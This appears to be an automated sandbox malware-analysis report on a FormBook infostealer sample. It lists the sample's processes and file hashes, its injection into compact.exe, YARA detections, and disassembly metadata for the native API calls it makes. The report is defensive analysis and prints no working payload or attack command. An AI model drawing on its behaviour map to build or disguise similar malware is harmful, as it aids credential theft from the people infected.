                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:08:45:28
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Users\user\Desktop\NjjLYnPSZr.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\NjjLYnPSZr.exe"
                                                                                                        Imagebase:0xdf0000
                                                                                                        File size:283'648 bytes
                                                                                                        MD5 hash:8A6AA375BC5CA6EA45711462189103CB
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:08:45:44
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe"
                                                                                                        Imagebase:0xb60000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:08:45:46
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\compact.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\compact.exe"
                                                                                                        Imagebase:0xd00000
                                                                                                        File size:41'472 bytes
                                                                                                        MD5 hash:5CB107F69062D6D387F4F7A14737220E
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:08:45:59
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe"
                                                                                                        Imagebase:0xb60000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:08:46:11
                                                                                                        Start date:10/10/2024
                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                        Imagebase:0x7ff6bf500000
                                                                                                        File size:676'768 bytes
                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:1.2%
                                                                                                          Dynamic/Decrypted Code Coverage:5.4%
                                                                                                          Signature Coverage:14%
                                                                                                          Total number of Nodes:129
                                                                                                          Total number of Limit Nodes:10
                                                                                                          execution_graph 90797 e1f6e3 90798 e1f6f3 90797->90798 90799 e1f6f9 90797->90799 90802 e1e603 90799->90802 90801 e1f71f 90805 e1c7b3 90802->90805 90804 e1e61e 90804->90801 90806 e1c7d0 90805->90806 90807 e1c7de RtlAllocateHeap 90806->90807 90807->90804 90808 e148c3 90809 e148df 90808->90809 90810 e14907 90809->90810 90811 e1491b 90809->90811 90812 e1c4a3 NtClose 90810->90812 90818 e1c4a3 90811->90818 90814 e14910 90812->90814 90815 e14924 90821 e1e643 RtlAllocateHeap 90815->90821 90817 e1492f 90819 e1c4bd 90818->90819 90820 e1c4cb NtClose 90819->90820 90820->90815 90821->90817 90822 e1f743 90825 e1e523 90822->90825 90828 e1c803 90825->90828 90827 e1e53c 90829 e1c820 90828->90829 90830 e1c82e RtlFreeHeap 90829->90830 90830->90827 90919 e1bad3 90920 e1baf0 90919->90920 90923 1062df0 LdrInitializeThunk 90920->90923 90921 e1bb15 90923->90921 90924 e14c53 90928 e14c6c 90924->90928 90925 e14cb4 90926 e1e523 RtlFreeHeap 90925->90926 90927 e14cc4 90926->90927 90928->90925 90929 e14cf4 90928->90929 90931 e14cf9 90928->90931 90930 e1e523 RtlFreeHeap 90929->90930 90930->90931 90932 e19953 90933 e199b8 90932->90933 90934 e199eb 90933->90934 90937 e03963 90933->90937 90936 e199cd 90938 e03930 90937->90938 90941 e0390e 90938->90941 90942 e1c723 90938->90942 90941->90936 90943 e1c740 90942->90943 90946 1062c70 LdrInitializeThunk 90943->90946 90944 e03945 90944->90936 90946->90944 90831 e0b183 90833 e0b1c7 90831->90833 90832 e0b1e8 90833->90832 90834 e1c4a3 NtClose 90833->90834 90834->90832 90947 e03e93 90948 e03eac 90947->90948 90953 e07623 90948->90953 90950 e03eca 90951 e03f16 90950->90951 90952 e03f03 PostThreadMessageW 90950->90952 90952->90951 90954 e07647 90953->90954 90955 e07683 LdrLoadDll 90954->90955 90956 e0764e 90954->90956 90955->90956 90956->90950 90835 1062b60 LdrInitializeThunk 90957 e08bd8 90958 e1c4a3 NtClose 90957->90958 90959 e08be2 90958->90959 90836 df1c73 90837 df1c88 90836->90837 90840 e1fbb3 90837->90840 90843 e1e0d3 90840->90843 90844 e1e0f9 90843->90844 90855 df7453 90844->90855 90846 e1e10f 90854 df1d08 90846->90854 90858 e0af93 90846->90858 90848 e1e12e 90849 e1e143 90848->90849 90873 e1c853 90848->90873 90869 e181b3 90849->90869 90852 e1e15d 90853 e1c853 ExitProcess 90852->90853 90853->90854 90876 e062f3 90855->90876 90857 df7460 90857->90846 90859 e0afbf 90858->90859 90894 e0ae83 90859->90894 90862 e0b004 90865 e1c4a3 NtClose 90862->90865 90867 e0b020 90862->90867 90863 e0afec 90864 e1c4a3 NtClose 90863->90864 90866 e0aff7 90863->90866 90864->90866 90868 e0b016 90865->90868 90866->90848 90867->90848 90868->90848 90870 e18215 90869->90870 90872 e18222 90870->90872 90905 e08493 90870->90905 90872->90852 90874 e1c86d 90873->90874 90875 e1c87e ExitProcess 90874->90875 90875->90849 90878 e0630d 90876->90878 90877 e06323 90877->90857 90878->90877 90880 e1cee3 90878->90880 90882 e1cefd 90880->90882 90881 e1cf2c 90881->90877 90882->90881 90887 e1bb23 90882->90887 90885 e1e523 RtlFreeHeap 90886 e1cf9f 90885->90886 90886->90877 90888 e1bb40 90887->90888 90891 1062c0a 90888->90891 90889 e1bb69 90889->90885 90892 1062c11 90891->90892 90893 1062c1f LdrInitializeThunk 90891->90893 90892->90889 90893->90889 90895 e0af79 90894->90895 90896 e0ae9d 90894->90896 90895->90862 90895->90863 90900 e1bbb3 90896->90900 90899 e1c4a3 NtClose 90899->90895 90901 e1bbcd 90900->90901 90904 10635c0 LdrInitializeThunk 90901->90904 90902 e0af6d 90902->90899 90904->90902 90907 e084bd 90905->90907 90906 e089bb 90906->90872 90907->90906 90913 e03b03 90907->90913 90909 e085e4 90909->90906 90910 e1e523 RtlFreeHeap 90909->90910 90911 e085fc 90910->90911 90911->90906 90912 e1c853 ExitProcess 90911->90912 90912->90906 90917 e03b23 90913->90917 90915 e03b82 90915->90909 90916 e03b8c 90916->90909 90917->90916 90918 e0b2a3 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 90917->90918 90918->90915

                                                                                                          Executed Functions

                                                                                                          Function 00E07623 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 51 e07623-e0764c call e1f223 54 e07652-e07660 call e1f823 51->54 55 e0764e-e07651 51->55 58 e07670-e07681 call e1dba3 54->58 59 e07662-e0766d call e1fac3 54->59 64 e07683-e07697 LdrLoadDll 58->64 65 e0769a-e0769d 58->65 59->58 64->65
                                                                                                          APIs
                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00E07695
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Load
                                                                                                          • String ID:
                                                                                                          • API String ID: 2234796835-0
                                                                                                          • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                                                                                          • Instruction ID: a25c42d50df94734ff3d0ed9d6e4f12d61d5f37397e8a5aa8d172792ef7a9e79
                                                                                                          • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                                                                                          • Instruction Fuzzy Hash: 15011EB5D0420DBBDB10DBE4DC42FDDB7B8AB54308F0081A5E909A7281F671EB54CB91
                                                                                                          Function 00E1C4A3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 77 e1c4a3-e1c4d9 call df4873 call e1d6b3 NtClose
                                                                                                          APIs
                                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00E1C4D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 3535843008-0
                                                                                                          • Opcode ID: fd7f006d6df5722d54c2d7a0f69f996be2d803c51140795f17f14a41dbade8c8
                                                                                                          • Instruction ID: 813e5cfcae781d7c4b86630809fa043a5b3f51b630526ed0e8f5e9b76b20fe4b
                                                                                                          • Opcode Fuzzy Hash: fd7f006d6df5722d54c2d7a0f69f996be2d803c51140795f17f14a41dbade8c8
                                                                                                          • Instruction Fuzzy Hash: 0AE046322042087BD620BE59EC02E9BB7ADDBC5750F008415FA08A7242C671F91187F5
                                                                                                          Function 01062B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 91 1062b60-1062b6c LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: f56c3f9efa4c839a4dfbd07574ba4a3f20c8df062877715cb4d5805c81eb4f57
                                                                                                          • Instruction ID: 6d5237f6bd414a9e99391eb0fa6da1e4f3f20399f4ad4f2e1beefd0a31ecb1c0
                                                                                                          • Opcode Fuzzy Hash: f56c3f9efa4c839a4dfbd07574ba4a3f20c8df062877715cb4d5805c81eb4f57
                                                                                                          • Instruction Fuzzy Hash: 8590026160240013510571588418616400A97E0201B55C032E1414590DC52589916239
                                                                                                          Function 01062DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 93 1062df0-1062dfc LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 0e515be520e27b6063c1260777a851db5f21b5c7ccc3d300e875fc7dbafa7580
                                                                                                          • Instruction ID: 79bc78b5bafbf0c4261f879b9e78d1113e9d34510f9cebbc85aab05a96d7ff08
                                                                                                          • Opcode Fuzzy Hash: 0e515be520e27b6063c1260777a851db5f21b5c7ccc3d300e875fc7dbafa7580
                                                                                                          • Instruction Fuzzy Hash: CF90023160140423E11171588508707000997D0241F95C423A0824558DD6568A52A235
                                                                                                          Function 01062C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 92 1062c70-1062c7c LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 060180c1348e388f033c26336ab7c1bc8d76db126dc4d1be4698cddd67c79ca9
                                                                                                          • Instruction ID: ebd15194420f866bcfa9776b30be70a9e159470a2dd4d3f3c3446a24b98bf0b7
                                                                                                          • Opcode Fuzzy Hash: 060180c1348e388f033c26336ab7c1bc8d76db126dc4d1be4698cddd67c79ca9
                                                                                                          • Instruction Fuzzy Hash: 7290023160148812E1107158C40874A000597D0301F59C422A4824658DC69589917235
                                                                                                          Function 010635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 94 10635c0-10635cc LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 9c0d891bc838e2f118b9eebf6233d863dcc56b12758b6ccc4d787dc86be0817f
                                                                                                          • Instruction ID: de9d99b20610e14d02c56afc1bb0be627980926157333f03cc5df5aab0985d0f
                                                                                                          • Opcode Fuzzy Hash: 9c0d891bc838e2f118b9eebf6233d863dcc56b12758b6ccc4d787dc86be0817f
                                                                                                          • Instruction Fuzzy Hash: B7900231A0550412E10071588518706100597D0201F65C422A0824568DC7958A5166B6
                                                                                                          Function 00E08493 Relevance: .4, Instructions: 435COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4f948744959b1fbeba504341c4923f80ab3134e929c92108e6691fe96c6add28
                                                                                                          • Instruction ID: 3ada91c55b6dbed40bec7de3b87f4616567d9c8f95bb0d552425b4e31c7c2695
                                                                                                          • Opcode Fuzzy Hash: 4f948744959b1fbeba504341c4923f80ab3134e929c92108e6691fe96c6add28
                                                                                                          • Instruction Fuzzy Hash: C7F1A271D0021AAFDF14DF94CD81AFEB7B8AF44304F5491A9E449B7281DB70AA85CFA1
                                                                                                          Function 00E03E88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(s1951-LPl,00000111,00000000,00000000), ref: 00E03F10
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: s1951-LPl$s1951-LPl
                                                                                                          • API String ID: 1836367815-3874984991
                                                                                                          • Opcode ID: 85e6faca536f5e2f5253e4a3436d354225dd990bb079f20668bfad4efedf7c52
                                                                                                          • Instruction ID: d437693634a689c8992611bb838f2b309d257f3da474243955aeb6405ee9f96d
                                                                                                          • Opcode Fuzzy Hash: 85e6faca536f5e2f5253e4a3436d354225dd990bb079f20668bfad4efedf7c52
                                                                                                          • Instruction Fuzzy Hash: 3C11E172E40219BADB2096A4CC02FDE7BBCDF81B50F048055FA04BB2C1D7B8570687A5
                                                                                                          Function 00E03E93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 14 e03e93-e03ea3 15 e03eac-e03f01 call e1efd3 call e07623 call df47e3 call e14d73 14->15 16 e03ea7 call e1e5c3 14->16 25 e03f23-e03f28 15->25 26 e03f03-e03f14 PostThreadMessageW 15->26 16->15 26->25 27 e03f16-e03f20 26->27 27->25
                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(s1951-LPl,00000111,00000000,00000000), ref: 00E03F10
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: s1951-LPl$s1951-LPl
                                                                                                          • API String ID: 1836367815-3874984991
                                                                                                          • Opcode ID: 71f89b66b1cdfc5221d419db0958a8f7bf41cb805fb256bdc9627ad2fb7205be
                                                                                                          • Instruction ID: 93150a401de15aae7e8c507e3e5dc169ebad798cc2df44ecc9579a2b666bcab8
                                                                                                          • Opcode Fuzzy Hash: 71f89b66b1cdfc5221d419db0958a8f7bf41cb805fb256bdc9627ad2fb7205be
                                                                                                          • Instruction Fuzzy Hash: 05018072E44218B6EB21A6A49C02FDF7BBC9F41B54F048155FA047B2C1E6B8670687E6
                                                                                                          Function 00E1C803 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 28 e1c803-e1c844 call df4873 call e1d6b3 RtlFreeHeap
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00E1C83F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID: xc
                                                                                                          • API String ID: 3298025750-1377889829
                                                                                                          • Opcode ID: 490d4aa338b1141acf51ea861ddb7e454b29fd6b8ca857531c7a4f5f5ffddfb1
                                                                                                          • Instruction ID: cf1f2e1057c194b2ac338a1cc7adf5081be1f9685f38694c8950384a37057469
                                                                                                          • Opcode Fuzzy Hash: 490d4aa338b1141acf51ea861ddb7e454b29fd6b8ca857531c7a4f5f5ffddfb1
                                                                                                          • Instruction Fuzzy Hash: 07E06D712042487BD610EE58EC41E9B33ACEFC5710F004019F908A7242DA70B9558AB9
                                                                                                          Function 00E1C7B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 66 e1c7b3-e1c7f4 call df4873 call e1d6b3 RtlAllocateHeap
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(?,00E0E43E,?,?,00000000,?,00E0E43E,?,?,?), ref: 00E1C7EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: eb9874a444ee62c078bc1252656f96f3d80ae0437e80c8a870960e1353e5580f
                                                                                                          • Instruction ID: 872bcd7f2054a7b2a8c67f73e69aca7acd867bf958a36c71408c27cdfee78ef4
                                                                                                          • Opcode Fuzzy Hash: eb9874a444ee62c078bc1252656f96f3d80ae0437e80c8a870960e1353e5580f
                                                                                                          • Instruction Fuzzy Hash: 70E01A723042487BD614EE99EC41EAB77ACEFC9B10F008919FA09A7241D671B911CBB9
                                                                                                          Function 00E076B3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 71 e076b3-e076b9 73 e07677-e07681 71->73 74 e076bb-e076c0 71->74 75 e07683-e07697 LdrLoadDll 73->75 76 e0769a-e0769d 73->76 75->76
                                                                                                          Memory Dump Source
